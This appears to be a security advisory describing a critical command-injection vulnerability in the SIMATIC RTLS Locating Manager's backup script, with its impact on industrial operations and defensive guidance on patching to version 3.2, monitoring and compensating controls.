A critical vulnerability has been identified in the SIMATIC RTLS Locating Manager, which could allow an authenticated attacker to compromise the system. The flaw stems from improper input validation within a backup script, potentially leading to remote code execution. Successful exploitation could result in a complete loss of control over the locating system, disrupting industrial operations and posing a significant security risk.

The vulnerability exists because the backup script in the SIMATIC RTLS Locating Manager does not properly sanitize or validate user-supplied input. An authenticated remote attacker can craft malicious input containing arbitrary commands. When the backup process is initiated, these commands are executed on the underlying server with the privileges of the Locating Manager service, leading to remote code execution.

This vulnerability is rated as critical severity with a CVSS score of 9.1, reflecting the high potential for significant business disruption. Successful exploitation could allow an attacker to take complete control of the SIMATIC RTLS Locating Manager. This could lead to the manipulation or theft of real-time location data, disruption of critical industrial processes that rely on this data, and potential operational downtime. For an organization, this translates to risks of production loss, safety incidents in the operational environment, and a potential pivot point for attackers to move deeper into the industrial control network.

Immediate Action: Update all instances of SIMATIC RTLS Locating Manager to version 3.2 or a later version to patch the vulnerability. Following the update, it is crucial to monitor for any signs of post-exploitation activity and to review system and access logs for any unauthorized access or anomalous behavior preceding the patch.

Proactive Monitoring: Implement enhanced logging and monitoring focused on the affected systems. Specifically, look for unusual command-line arguments or file paths in logs related to the backup script's execution. Monitor for unexpected network connections originating from the Locating Manager server and alert on any modifications to critical system files or the creation of unauthorized user accounts.

Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:

• Restrict network access to the management interface of the SIMATIC RTLS Locating Manager to a limited set of trusted administrative workstations.
• Apply stricter access control policies, ensuring that only highly trusted users have the permissions required to initiate the backup function.
• Deploy an Intrusion Detection/Prevention System (IDS/IPS) with rules to detect and block command injection attempts against the application.

Public Exploit Available: false

Given the critical CVSS score of 9.1 and the potential for severe operational impact within an industrial environment, this vulnerability presents a significant risk. We strongly recommend that the organization prioritize the immediate patching of all affected SIMATIC RTLS Locating Manager instances to version 3.2 or newer. If patching must be delayed, the compensating controls listed above should be implemented without delay to reduce the attack surface and mitigate the immediate risk of exploitation.